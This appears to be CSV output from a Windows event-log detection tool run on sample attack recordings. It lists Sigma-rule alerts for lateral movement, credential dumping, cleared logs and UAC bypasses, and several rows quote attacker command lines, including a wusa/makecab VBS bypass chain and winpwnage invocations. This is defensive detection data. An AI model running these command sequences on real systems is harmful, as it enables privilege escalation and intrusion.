2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx
2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
